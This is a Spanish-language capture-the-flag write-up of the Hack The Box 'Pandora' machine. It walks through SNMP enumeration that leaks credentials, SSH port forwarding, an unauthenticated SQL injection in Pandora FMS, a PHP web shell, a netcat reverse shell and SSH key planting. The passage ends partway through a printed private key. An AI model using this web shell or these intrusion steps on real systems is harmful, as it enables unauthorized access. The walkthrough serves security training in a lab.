HackTheBox
Pandora - Hack The Box
⮕ Maquina Linux
❯ ping -c 1 10.10.11.136
PING 10.10.11.136 (10.10.11.136) 56(84) bytes of data.
64 bytes from 10.10.11.136: icmp_seq=1 ttl=63 time=115 ms
--- 10.10.11.136 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 115.319/115.319/115.319/0.000 ms
❯ whichSystem.py 10.10.11.136
10.10.11.136 (ttl -> 63): Linux
PortScan
❯ nmap -sCV -p22,80 10.10.11.136 -oN targeted
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-20 17:44 CST
Nmap scan report for 10.10.11.136
Host is up (0.12s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 24c295a5c30b3ff3173c68d7af2b5338 (RSA)
| 256 b1417799469a6c5dd2982fc0329ace03 (ECDSA)
|_ 256 e736433ba9478a190158b2bc89f65108 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Play | Landing
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Enumeracion
Estas son las tecnologías que corren el puerto 80 que corresponden a http
❯ whatweb http://10.10.11.136
http://10.10.11.136 [200 OK] Apache[2.4.41], Bootstrap, Country[RESERVED][ZZ], Email[contact@panda.htb,example@yourmail.com,support@panda.htb], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.41 (Ubuntu)], IP[10.10.11.136], Open-Graph-Protocol[website], Script, Title[Play | Landing], probably WordPress, X-UA-Compatible[IE=edge]
Esta es la pagina web
Ya no están dando un subdominio al decirnos que es una extencion de Panda.htb
Antes de agregarlo al /etc/hosts vamos a aplicar fuzzing para ver que no nos hemos dejado nada, pero no encontramos nada
❯ dirsearch -u http://10.10.11.136
_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10903
Output File: /usr/lib/python3/dist-packages/dirsearch/reports/10.10.11.136/_23-06-20_17-53-36.txt
Error Log: /usr/lib/python3/dist-packages/dirsearch/logs/errors-23-06-20_17-53-36.log
Target: http://10.10.11.136/
[17:53:37] Starting:
[17:53:44] 403 - 277B - /.ht_wsr.txt
[17:53:44] 403 - 277B - /.htaccess.bak1
[17:53:44] 403 - 277B - /.htaccess.orig
[17:53:44] 403 - 277B - /.htaccess.sample
[17:53:44] 403 - 277B - /.htaccess.save
[17:53:44] 403 - 277B - /.htaccess_extra
[17:53:44] 403 - 277B - /.htaccess_orig
[17:53:44] 403 - 277B - /.htaccess_sc
[17:53:44] 403 - 277B - /.htaccessBAK
[17:53:44] 403 - 277B - /.htaccessOLD
[17:53:44] 403 - 277B - /.htaccessOLD2
[17:53:44] 403 - 277B - /.htm
[17:53:44] 403 - 277B - /.html
[17:53:44] 403 - 277B - /.htpasswd_test
[17:53:45] 403 - 277B - /.htpasswds
[17:53:45] 403 - 277B - /.httr-oauth
[17:53:47] 403 - 277B - /.php
[17:54:16] 200 - 2KB - /assets/
[17:54:16] 301 - 313B - /assets -> http://10.10.11.136/assets/
[17:54:36] 200 - 33KB - /index.html
[17:54:55] 403 - 277B - /server-status/
[17:54:56] 403 - 277B - /server-status
Task Completed
Subdomain panda.htb
Ahora si vamos agregar el subdominio al /etc/hosts por que no encontramos nada haciendo fuzzing
❯ echo "10.10.11.136 panda.htb" | sudo tee -a /etc/hosts
10.10.11.136 panda.htb
❯ ping -c 1 panda.htb
PING panda.htb (10.10.11.136) 56(84) bytes of data.
64 bytes from panda.htb (10.10.11.136): icmp_seq=1 ttl=63 time=109 ms
--- panda.htb ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 109.396/109.396/109.396/0.000 ms
Pero vemos lo mismo
Así que ahora ahora lo que vamos a hacer es Fuzzing otra vez para ahora si a nivel de subdominio encontramos algo
❯ dirsearch -u http://panda.htb/
_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10903
Output File: /usr/lib/python3/dist-packages/dirsearch/reports/panda.htb/-_23-06-20_18-16-17.txt
Error Log: /usr/lib/python3/dist-packages/dirsearch/logs/errors-23-06-20_18-16-17.log
Target: http://panda.htb/
[18:16:18] Starting:
[18:16:27] 403 - 274B - /.ht_wsr.txt
[18:16:27] 403 - 274B - /.htaccess.bak1
[18:16:27] 403 - 274B - /.htaccess.orig
[18:16:27] 403 - 274B - /.htaccess.sample
[18:16:27] 403 - 274B - /.htaccess.save
[18:16:27] 403 - 274B - /.htaccess_extra
[18:16:27] 403 - 274B - /.htaccess_orig
[18:16:27] 403 - 274B - /.htaccess_sc
[18:16:27] 403 - 274B - /.htaccessBAK
[18:16:27] 403 - 274B - /.htaccessOLD2
[18:16:27] 403 - 274B - /.htaccessOLD
[18:16:27] 403 - 274B - /.htm
[18:16:27] 403 - 274B - /.html
[18:16:27] 403 - 274B - /.htpasswd_test
[18:16:27] 403 - 274B - /.htpasswds
[18:16:27] 403 - 274B - /.httr-oauth
[18:16:31] 403 - 274B - /.php
[18:17:07] 301 - 307B - /assets -> http://panda.htb/assets/
[18:17:07] 200 - 2KB - /assets/
[18:17:28] 200 - 33KB - /index.html
[18:17:46] 403 - 274B - /server-status
[18:17:46] 403 - 274B - /server-status/
Task Completed
No vemos nada así que ahora vamos a hacer Fuzzing pero para subdominios, pero no encontramos nada
❯ gobuster vhost -u http://panda.htb/ -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -t 50
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://panda.htb/
[+] Method: GET
[+] Threads: 50
[+] Wordlist: /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2023/06/20 18:52:43 Starting gobuster in VHOST enumeration mode
===============================================================
===============================================================
2023/06/20 18:53:33 Finished
===============================================================
Después de usar nikto no encontré gran cosa así que lo que podemos hacer es volver a hacer un escaneo de Nmap pero ahora mediante el protocolo UDP ya que el que siempre hacemos es TCP pero como no vemos nada pues podemos optar por hacerlo mediante este servicio para ver si podemos encontrar algo mas de informacion
❯ nikto -h http://panda.htb/
PortScan UDP
Vemos un puerto abierto
❯ nmap --open -sU --top-ports 100 -T5 -vvv -n 10.10.11.136 -oG udpPorts
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-20 19:04 CST
Initiating Ping Scan at 19:04
Scanning 10.10.11.136 [4 ports]
Completed Ping Scan at 19:04, 0.12s elapsed (1 total hosts)
Initiating UDP Scan at 19:04
Scanning 10.10.11.136 [100 ports]
Warning: 10.10.11.136 giving up on port because retransmission cap hit (2).
Discovered open port 161/udp on 10.10.11.136
Vemos que dice algo de Linux Pandora y la maquina se llama Pandora
❯ nmap -sUCV -p161 10.10.11.136 -oN UDPtargeted
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-20 19:10 CST
Nmap scan report for panda.htb (10.10.11.136)
Host is up (0.11s latency).
Bug in snmp-win32-software: no string output.
PORT STATE SERVICE VERSION
161/udp open snmp net-snmp; net-snmp SNMPv3 server
| snmp-processes:
| 1:
| 2:
| 3:
| 4:
| 6:
| 9:
| 10:
| 11:
| 12:
| 13:
| 14:
| 15:
| 16:
| 17:
| 18:
| 20:
| 21:
| 22:
| 23:
| 24:
| 25:
| 26:
| 27:
| 28:
| 29:
| 30:
| 77:
| 78:
| 79:
| 80:
| 81:
| 82:
| 83:
| 84:
| 85:
| 88:
| 89:
| 91:
| 92:
| 93:
| 94:
| 95:
| 96:
| 97:
| 98:
| 99:
| 100:
| 101:
| 102:
| 103:
| 104:
| 105:
| 106:
| 107:
|_ 108:
| snmp-interfaces:
| lo
| IP address: 127.0.0.1 Netmask: 255.0.0.0
| Type: softwareLoopback Speed: 10 Mbps
| Traffic stats: 755.52 Kb sent, 755.38 Kb received
| VMware VMXNET3 Ethernet Controller
| IP address: 10.10.11.136 Netmask: 255.255.254.0
| MAC address: 005056b91f8c (VMware)
| Type: ethernetCsmacd Speed: 4 Gbps
|_ Traffic stats: 67.16 Mb sent, 18.75 Mb received
| snmp-info:
| enterprise: net-snmp
| engineIDFormat: unknown
| engineIDData: 48fa95537765c36000000000
| snmpEngineBoots: 30
|_ snmpEngineTime: 1h28m34s
| snmp-sysdescr: Linux pandora 5.4.0-91-generic #102-Ubuntu SMP Fri Nov 5 16:31:28 UTC 2021 x86_64
|_ System uptime: 1h28m34.93s (531493 timeticks)
| snmp-netstat:
| TCP 0.0.0.0:22 0.0.0.0:0
| TCP 10.10.11.136:55802 1.1.1.1:53
| TCP 127.0.0.1:3306 0.0.0.0:0
| TCP 127.0.0.53:53 0.0.0.0:0
| UDP 0.0.0.0:161 *:*
|_ UDP 127.0.0.53:53 *:*
Enumeracion UDP
Una herramienta para enumerar este servicio es esta `apt install snmp snmp-mibs-downloader
❯ snmpwalk -h
USAGE: snmpwalk [OPTIONS] AGENT [OID]
Version: 5.9
Web: http://www.net-snmp.org/
Email: net-snmp-coders@lists.sourceforge.net
OPTIONS:
-h, --help display this help message
-H display configuration file directives understood
-v 1|2c|3 specifies SNMP version to use
-V, --version display package version number
SNMP Version 1 or 2c specific
-c COMMUNITY set the community string
SNMP Version 3 specific
-a PROTOCOL set authentication protocol (MD5|SHA|SHA-224|SHA-256|SHA-384|SHA-512)
-A PASSPHRASE set authentication protocol pass phrase
-e ENGINE-ID set security engine ID (e.g. 800000020109840301)
-E ENGINE-ID set context engine ID (e.g. 800000020109840301)
-l LEVEL set security level (noAuthNoPriv|authNoPriv|authPriv)
-n CONTEXT set context name (e.g. bridge1)
-u USER-NAME set security name (e.g. bert)
-x PROTOCOL set privacy protocol (DES|AES)
-X PASSPHRASE set privacy protocol pass phrase
-Z BOOTS,TIME set destination engine boots/time
General communication options
-r RETRIES set the number of retries
-t TIMEOUT set the request timeout (in seconds)
Debugging
-d dump input/output packets in hexadecimal
-D[TOKEN[,...]] turn on debugging output for the specified TOKENs
(ALL gives extremely verbose debugging output)
General options
-m MIB[:...] load given list of MIBs (ALL loads everything)
-M DIR[:...] look in given list of directories for MIBs
(default: $HOME/.snmp/mibs:/usr/share/snmp/mibs:/usr/share/snmp/mibs/iana:/usr/share/snmp/mibs/ietf)
-P MIBOPTS Toggle various defaults controlling MIB parsing:
u: allow the use of underlines in MIB symbols
c: disallow the use of "--" to terminate comments
d: save the DESCRIPTIONs of the MIB objects
e: disable errors when MIB symbols conflict
w: enable warnings when MIB symbols conflict
W: enable detailed warnings when MIB symbols conflict
R: replace MIB symbols from latest module
-O OUTOPTS Toggle various defaults controlling output display:
0: print leading 0 for single-digit hex characters
a: print all strings in ascii format
b: do not break OID indexes down
e: print enums numerically
E: escape quotes in string indices
f: print full OIDs on output
n: print OIDs numerically
p PRECISION: display floating point values with specified PRECISION (printf format string)
q: quick print for easier parsing
Q: quick print with equal-signs
s: print only last symbolic element of OID
S: print MIB module-id plus last element
t: print timeticks unparsed as numeric integers
T: print human-readable text along with hex strings
u: print OIDs using UCD-style prefix suppression
U: don't print units
v: print values only (not OID = value)
x: print all strings in hex format
X: extended index format
-I INOPTS Toggle various defaults controlling input parsing:
b: do best/regex matching to find a MIB node
h: don't apply DISPLAY-HINTs
r: do not check values for range/type legality
R: do random access to OID labels
u: top-level OIDs must have '.' prefix (UCD-style)
s SUFFIX: Append all textual OIDs with SUFFIX before parsing
S PREFIX: Prepend all textual OIDs with PREFIX before parsing
-L LOGOPTS Toggle various defaults controlling logging:
e: log to standard error
o: log to standard output
n: don't log at all
f file: log to the specified file
s facility: log to syslog (via the specified facility)
(variants)
[EON] pri: log to standard error, output or /dev/null for level 'pri' and above
[EON] p1-p2: log to standard error, output or /dev/null for levels 'p1' to 'p2'
[FS] pri token: log to file/syslog for level 'pri' and above
[FS] p1-p2 token: log to file/syslog for levels 'p1' to 'p2'
-C APPOPTS Set various application specific behaviours:
p: print the number of variables found
i: include given OID in the search range
I: don't include the given OID, even if no results are returned
c: do not check returned OIDs are increasing
t: Display wall-clock time to complete the walk
T: Display wall-clock time to complete each request
E {OID}: End the walk at the specified OID
Pero antes de usarla para enumerar este servicio necesitamos saber el community string la mas conocida es la Public así que vamos a probar
Usaremos el parámetro v2c que es para la versión pero lo único malo de esto es que va muy lento
❯ snmpwalk -v2c -c public 10.10.11.136
iso.3.6.1.2.1.1.1.0 = STRING: "Linux pandora 5.4.0-91-generic #102-Ubuntu SMP Fri Nov 5 16:31:28 UTC 2021 x86_64"
iso.3.6.1.2.1.1.2.0 = OID: iso.3.6.1.4.1.8072.3.2.10
iso.3.6.1.2.1.1.3.0 = Timeticks: (689294) 1:54:52.94
iso.3.6.1.2.1.1.4.0 = STRING: "Daniel"
iso.3.6.1.2.1.1.5.0 = STRING: "pandora"
iso.3.6.1.2.1.1.6.0 = STRING: "Mississippi"
iso.3.6.1.2.1.1.7.0 = INTEGER: 72
iso.3.6.1.2.1.1.8.0 = Timeticks: (53) 0:00:00.53
iso.3.6.1.2.1.1.9.1.2.1 = OID: iso.3.6.1.6.3.10.3.1.1
iso.3.6.1.2.1.1.9.1.2.2 = OID: iso.3.6.1.6.3.11.3.1.1
iso.3.6.1.2.1.1.9.1.2.3 = OID: iso.3.6.1.6.3.15.2.1.1
iso.3.6.1.2.1.1.9.1.2.4 = OID: iso.3.6.1.6.3.1
^C
Vamos a usar otro herramienta que es mucho mejor y va mucha mas rápido solo que vamos a exportar toda la información a un archivo
❯ snmpbulkwalk -c public -v2c 10.10.11.136 > snmp_enum.txt
Tiene muchas lineas para no ver todo y ver directamente por cosas interesantes con la anterior herramienta vimos que había un usuario que se llama Daniel Podemos filtrar por Daniel
❯ cat snmp_enum.txt | wc -l
7014
Y ya vemos que se esta ejecutando algo y nos comparten credenciales daniel:HotelBabylon23
❯ cat snmp_enum.txt | grep "Daniel" -i
iso.3.6.1.2.1.1.4.0 = STRING: "Daniel"
iso.3.6.1.2.1.25.4.2.1.5.851 = STRING: "-c sleep 30; /bin/bash -c '/usr/bin/host_check -u daniel -p HotelBabylon23'"
iso.3.6.1.2.1.25.4.2.1.5.1117 = STRING: "-u daniel -p HotelBabylon23"
Shell as daniel
Si probamos las credenciales por SSH que encontramos por SNMP que estaban expuestas vemos que funcionan
❯ ssh daniel@10.10.11.136
The authenticity of host '10.10.11.136 (10.10.11.136)' can't be established.
ECDSA key fingerprint is SHA256:9urFJN3aRYRRc9S5Zc+py/w4W6hmZ+WLg6CyrY+5MDI.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.136' (ECDSA) to the list of known hosts.
daniel@10.10.11.136's password:
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-91-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Wed 21 Jun 01:51:57 UTC 2023
System load: 0.0
Usage of /: 63.2% of 4.87GB
Memory usage: 9%
Swap usage: 0%
Processes: 229
Users logged in: 0
IPv4 address for eth0: 10.10.11.136
IPv6 address for eth0: dead:beef::250:56ff:feb9:1f8c
=> /boot is using 91.8% of 219MB
0 updates can be applied immediately.
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
daniel@pandora:~$
Hay otro usuario llamado matt
daniel@pandora:~$ cat /etc/passwd | grep sh
root:x:0:0:root:/root:/bin/bash
sshd:x:112:65534::/run/sshd:/usr/sbin/nologin
matt:x:1000:1000:matt:/home/matt:/bin/bash
daniel:x:1001:1001::/home/daniel:/bin/bash
daniel@pandora:~$
Si o si nos tenemos que convertir en el para poder leer la user.txt
daniel@pandora:/home/matt$ ls -la
total 24
drwxr-xr-x 2 matt matt 4096 Dec 7 2021 .
drwxr-xr-x 4 root root 4096 Dec 7 2021 ..
lrwxrwxrwx 1 matt matt 9 Jun 11 2021 .bash_history -> /dev/null
-rw-r--r-- 1 matt matt 220 Feb 25 2020 .bash_logout
-rw-r--r-- 1 matt matt 3771 Feb 25 2020 .bashrc
-rw-r--r-- 1 matt matt 807 Feb 25 2020 .profile
-rw-r----- 1 root matt 33 Jun 20 23:42 user.txt
Si listamos por privilegios SUID vemos esto ./usr/bin/pandora_backup
daniel@pandora:/$ find \-perm -4000 2>/dev/null
./usr/bin/sudo
./usr/bin/pkexec
./usr/bin/chfn
./usr/bin/newgrp
./usr/bin/gpasswd
./usr/bin/umount
./usr/bin/pandora_backup
./usr/bin/passwd
./usr/bin/mount
./usr/bin/su
./usr/bin/at
./usr/bin/fusermount
./usr/bin/chsh
./usr/lib/openssh/ssh-keysign
./usr/lib/dbus-1.0/dbus-daemon-launch-helper
./usr/lib/eject/dmcrypt-get-device
./usr/lib/policykit-1/polkit-agent-helper-1
daniel@pandora:/$
El grupo asignado es matt y el propietario es root
daniel@pandora:/$ ls -l ./usr/bin/pandora_backup
-rwsr-x--- 1 root matt 16816 Dec 3 2021 ./usr/bin/pandora_backup
daniel@pandora:/$
Pero bueno tenemos que convertirnos en el usuario matt vamos irnos a donde esta montada la web para ver si encontramos algo
daniel@pandora:/var/www$ ls
html pandora
daniel@pandora:/var/www$
Si ingresamos al directorio vemos esto
daniel@pandora:/var/www$ cd pandora/
daniel@pandora:/var/www/pandora$ ls
index.html pandora_console
daniel@pandora:/var/www/pandora$ cd pandora_console/
daniel@pandora:/var/www/pandora/pandora_console$ ls
AUTHORS attachment extras index.php pandora_console_logrotate_suse tests
COPYING audit.log fonts install.done pandora_console_logrotate_ubuntu tools
DB_Dockerfile composer.json general mobile pandora_console_upgrade vendor
DEBIAN composer.lock godmode operation pandora_websocket_engine.service ws.php
Dockerfile docker_entrypoint.sh images pandora_console.log pandoradb.sql
ajax.php extensions include pandora_console_logrotate_centos pandoradb_data.sql
daniel@pandora:/var/www/pandora/pandora_console$
Si corroboramos vemos que es Apache2 y vemos un pandora.conf
daniel@pandora:/var/www/pandora/pandora_console$ cd /etc/apache2/sites-enabled/
daniel@pandora:/etc/apache2/sites-enabled$ ls
000-default.conf pandora.conf
daniel@pandora:/etc/apache2/sites-enabled$
Bueno al ver el contenido del archivo ya vemos un subdominio nuevo y lo esta corriendo el usuario matt
daniel@pandora:/etc/apache2/sites-enabled$ cat pandora.conf
<VirtualHost localhost:80>
ServerAdmin admin@panda.htb
ServerName pandora.panda.htb
DocumentRoot /var/www/pandora
AssignUserID matt matt
<Directory /var/www/pandora>
AllowOverride All
</Directory>
ErrorLog /var/log/apache2/error.log
CustomLog /var/log/apache2/access.log combined
</VirtualHost>
daniel@pandora:/etc/apache2/sites-enabled$
Vamos a agregarlo al /etc/hosts para ver si vemos algo diferente
❯ cat /etc/hosts | tail -n 1
10.10.11.136 panda.htb pandora.panda.htb
Pero nada vemos lo mismo
Pero bueno se esta corriendo por el puerto 80 si hacemos un curl pasa esto nos redirige al servicio
daniel@pandora:/etc/apache2/sites-enabled$ curl localhost
<meta HTTP-EQUIV="REFRESH" content="0; url=/pandora_console/">
daniel@pandora:/etc/apache2/sites-enabled$
Bueno si tal lo que podemos hacer es hacer un Local Port Forwarding para que el puerto 80 de la maquina victima se convierta en nuestro puerto 80
Local Port Forwarding
Con esto nuestro puerto 80 es el puerto 80 de la maquina ya que esta corriendo en nuestro Local host importante esto hay que hacerlo como root
❯ ssh daniel@10.10.11.136 -L 80:127.0.0.1:80
daniel@10.10.11.136's password:
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-91-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Wed 21 Jun 16:45:49 UTC 2023
System load: 0.51
Usage of /: 63.0% of 4.87GB
Memory usage: 7%
Swap usage: 0%
Processes: 262
Users logged in: 0
IPv4 address for eth0: 10.10.11.136
IPv6 address for eth0: dead:beef::250:56ff:feb9:493f
=> /boot is using 91.8% of 219MB
0 updates can be applied immediately.
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
daniel@pandora:~$
Ahora el puerto 80 de la maquina es de nosotros
❯ lsof -i:80
COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
ssh 14864 root 4u IPv6 64090 0t0 TCP localhost:http (LISTEN)
ssh 14864 root 5u IPv4 64091 0t0 TCP localhost:http (LISTEN)
Este es el contenido de lo que se esta corriendo en la maquina victima
Como nos están dando la versión podemos buscar si existen vulnerabilidades
CVE-2021-32099 Unauthenticated SQL Injection
Si investigamos la vulnerabilidades hay una la cual es interesante ya que no tenemos credenciales y esta vulnerabilidad es Unauthenticated SQL Injection https://www.sonarsource.com/blog/pandora-fms-742-critical-code-vulnerabilities-explained/
Vamos a seguir los pasos que nos están dando de primeras no nos sale nada
Si probamos haciendo poniendo un comilla vamos a ver que ya nos da un error de mysql
Bueno basándonos en ese error vamos a proceder a hacer un ordenamiento de las columnas para saber cuantas hay y cuando desaparezca el error es por que ya sabemos las correctas
Después de estar haciendo vemos que hay 3
Vemos también que como tal existen muchas vulnerabilidades
❯ searchsploit pandora
---------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------------------------------------------------------- ---------------------------------
Pandora 7.0NG - Remote Code Execution | php/webapps/47898.py
Pandora FMS - Ping Authenticated Remote Code Execution (Metasploit) | linux/remote/48334.rb
Pandora Fms - Remote Code Execution (Metasploit) | linux/remote/31518.rb
Pandora Fms - SQL Injection Remote Code Execution (Metasploit) | php/remote/35380.rb
Pandora FMS 3.1 - Authentication Bypass | php/webapps/15639.txt
Pandora FMS 3.1 - Authentication Bypass / Arbitrary File Upload (Metasploit) | php/remote/35731.rb
Pandora Fms 3.1 - Blind SQL Injection | php/webapps/15642.txt
Pandora Fms 3.1 - Directory Traversal / Local File Inclusion | php/webapps/15643.txt
Pandora Fms 3.1 - OS Command Injection | php/webapps/15640.txt
Pandora Fms 3.1 - SQL Injection | php/webapps/15641.txt
Pandora Fms 3.2.1 - Cross-Site Request Forgery | php/webapps/17524.html
Pandora FMS 3.x - 'index.php' Cross-Site Scripting | php/webapps/36073.txt
Pandora FMS 4.0.1 - 'sec2' Local File Inclusion | php/webapps/36792.txt
Pandora Fms 4.0.1 - Local File Inclusion | php/webapps/18494.txt
Pandora FMS 5.0/5.1 - Authentication Bypass | php/webapps/37255.txt
Pandora Fms 5.0RC1 - Remote Command Injection | php/webapps/31436.txt
Pandora FMS 5.1 SP1 - SQL Injection | php/webapps/36055.txt
Pandora FMS 7.0 NG 749 - 'CG Items' SQL Injection (Authenticated) | php/webapps/49046.txt
Pandora FMS 7.0 NG 749 - Multiple Persistent Cross-Site Scripting Vulnerabilities | php/webapps/49139.txt
Pandora FMS 7.0 NG 750 - 'Network Scan' SQL Injection (Authenticated) | php/webapps/49312.txt
Pandora FMS 7.0NG - 'net_tools.php' Remote Code Execution | php/webapps/48280.py
Pandora FMS Monitoring Application 2.1.x /3.x - SQL Injection | php/webapps/10570.txt
Pandora FMS v7.0NG.742 - Remote Code Execution (RCE) (Authenticated) | php/webapps/50961.py
PANDORAFMS 7.0 - Authenticated Remote Code Execution | php/webapps/48064.py
PandoraFMS 7.0 NG 746 - Persistent Cross-Site Scripting | php/webapps/48707.txt
PandoraFMS NG747 7.0 - 'filename' Persistent Cross-Site Scripting | php/webapps/48700.txt
---------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Vemos estos 2 que ya están interesantes
Vamos a probar este para ver que tal esta https://github.com/shyam0904a/Pandora_v7.0NG.742_exploit_unauthenticated
Nos pide un archivo
❯ wget https://raw.githubusercontent.com/shyam0904a/Pandora_v7.0NG.742_exploit_unauthenticated/master/sqlpwn.py
--2023-06-21 11:04:06-- https://raw.githubusercontent.com/shyam0904a/Pandora_v7.0NG.742_exploit_unauthenticated/master/sqlpwn.py
Resolviendo raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.108.133, 185.199.111.133, 185.199.110.133, ...
Conectando con raw.githubusercontent.com (raw.githubusercontent.com)[185.199.108.133]:443... conectado.
Petición HTTP enviada, esperando respuesta... 200 OK
Longitud: 6230 (6.1K) [text/plain]
Grabando a: «sqlpwn.py»
sqlpwn.py 100%[=======================================================>] 6.08K --.-KB/s en 0.003s
2023-06-21 11:04:06 (1.91 MB/s) - «sqlpwn.py» guardado [6230/6230]
❯ python3 sqlpwn.py
usage: sqlpwn.py [-h] -t TARGET [-f FILENAME]
sqlpwn.py: error: the following arguments are required: -t/--target
Si analizamos el exploit vemos que esta subiendo una webshell a una ruta lo cual esto ya es interesante ya que con esto sabemos que se pueden subir archivos pero supongo que eso es cuando ya estas dentro del panel de este servicio
Ademas las primeras lineas del script vemos que se esta empleando una cookie del usuario administrador la cual aun no tenemos vamos a copiarnos la inyección para ver que es lo que hace
Como tal no pasa nada
Hay vemos la query
Pero bueno hay que recordar que con esta query le estamos robando la cookie al usuario administrador así que si esto funciono solo quitamos toda la query que metimos y listo estamos logueados (quitamos la query una vez inyectada de tal modo que la url quedaría así **localhost:80/pandora_console/ )
Bueno ahora que estamos logueados hay que recordar que en el script esta subiendo una webshell para ganar acceso así que tenemos que ver donde es donde esta subiendo la webshell
Si nos vamos a Admin tools vemos que hay una parte llamada File Manager
Vamos a crear un nuevo directorio
Una vez le damos el nombre que queremos y le damos en el botón de crear vemos que funciona
En el script también vemos que hay una ruta donde básicamente se esta subiendo todo
Si le damos click en la carpeta que creamos en la interfaz gráfica de pandora donde estábamos
❯ catn cmd.php
<?php
echo "<pre>" . shell_exec($_REQUEST['cmd']) . "</pre>";
?>
Ahora vamos a subir el archivo
Y vemos que si se pudo subir
Y funciono
Tenemos ejecución remota de comandos
Shell as matt
Ahora nos vamos a poner en escucha
❯ nc -nlvp 443
listening on [any] 443 ...
Enviamos la shell
Y nos llega la shell
❯ nc -nlvp 443
listening on [any] 443 ...
connect to [10.10.14.12] from (UNKNOWN) [10.10.11.136] 58230
bash: cannot set terminal process group (877): Inappropriate ioctl for device
bash: no job control in this shell
matt@pandora:/var/www/pandora/pandora_console/images/xd$ whoami
whoami
matt
matt@pandora:/var/www/pandora/pandora_console/images/xd$
Ahora vamos a hacer un tratamiento de la tty
matt@pandora:/var/www/pandora/pandora_console/images/xd$ script /dev/null -c bash
<pandora_console/images/xd$ script /dev/null -c bash
Script started, file is /dev/null
matt@pandora:/var/www/pandora/pandora_console/images/xd$ ^Z
zsh: suspended nc -nlvp 443
❯ stty raw -echo; fg
[1] + continued nc -nlvp 443
reset xterm
ENTER
matt@pandora:/var/www/pandora/pandora_console/images/xd$ export TERM=xterm
User.txt
matt@pandora:/home/matt$ cat user.txt
7013a510dc89a775b5ca748e04f09a0c
matt@pandora:/home/matt$
Escalada de privilegios
Si buscamos por privilegios SUID vemos que esta lo que ya habíamos visto ./usr/bin/pandora_backup al igual que el pkexec
También algo que podemos hacer es conectarnos mediante SSH pero para eso tenemos que crear el directorio y aparte generar las claves
matt@pandora:/home/matt$ mkdir .ssh
matt@pandora:/home/matt$ ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/home/matt/.ssh/id_rsa):
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /home/matt/.ssh/id_rsa
Your public key has been saved in /home/matt/.ssh/id_rsa.pub
The key fingerprint is:
SHA256:tTtzyMTd02yfATW1wga+q61CmakX+L9jTJJG8+tZ01A matt@pandora
The key's randomart image is:
+---[RSA 3072]----+
| . oo|
| . o . o|
| .. E . |
| o o o+.oo |
| o S +o. o.+|
| . X = o+ o+|
| = = B+.. ..|
| . + ==+. |
| . =B+. |
+----[SHA256]-----+
matt@pandora:/home/matt$ cd .ssh/
matt@pandora:/home/matt/.ssh$ ls
id_rsa id_rsa.pub
matt@pandora:/home/matt/.ssh$ cat id_rsa.pub > authorized_keys
matt@pandora:/home/matt/.ssh$ chmod 600 authorized_keys
matt@pandora:/home/matt/.ssh$
Y pues esta seria la id_rsa
matt@pandora:/home/matt/.ssh$ cat id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn
NhAAAAAwEAAQAAAYEAx26tZIidVE1FgFus/+JX62WMEnRD4rMcK5mZkvEK4P/SJgO03YL/
knptT+FjWnFq/nv4HbltFI9MFP/7GR1o2BKvuf7e0b/EY4EpibACTkqhopcjkWXsrjO1fe
YqSl2uCsly8p7TNYEFvz+5bnsPXhN7cmpbcxh5LWjPpveUgtvLM4XyU04sqV9gUjK0gfua
Xq7ce04Jtk6s3aYFUy0zciM4st1QIo/bMI+2ROVwtNl/KYnghh1trak2pmRL95//FU54xd
RLPuS3y/BNOk5ZJM6Z5JVEIj+jbcZT5rtu+0o6exqfTfE6QaAPDFVkHhh8wwG7jNq/rrbp
8Z/UpZmrGemb++sOpokNto1hKbDjUNwkyZESM+YNeQh8HVYnXpPSX/Sfji1Jiy+1heHI0C
KZxYM/dYIa/CVj/fuJX3pT3mOvP1msoRyfx7zA8QcBWCNzw9tW4BsNVNQr90/Z6Vl6J9wF
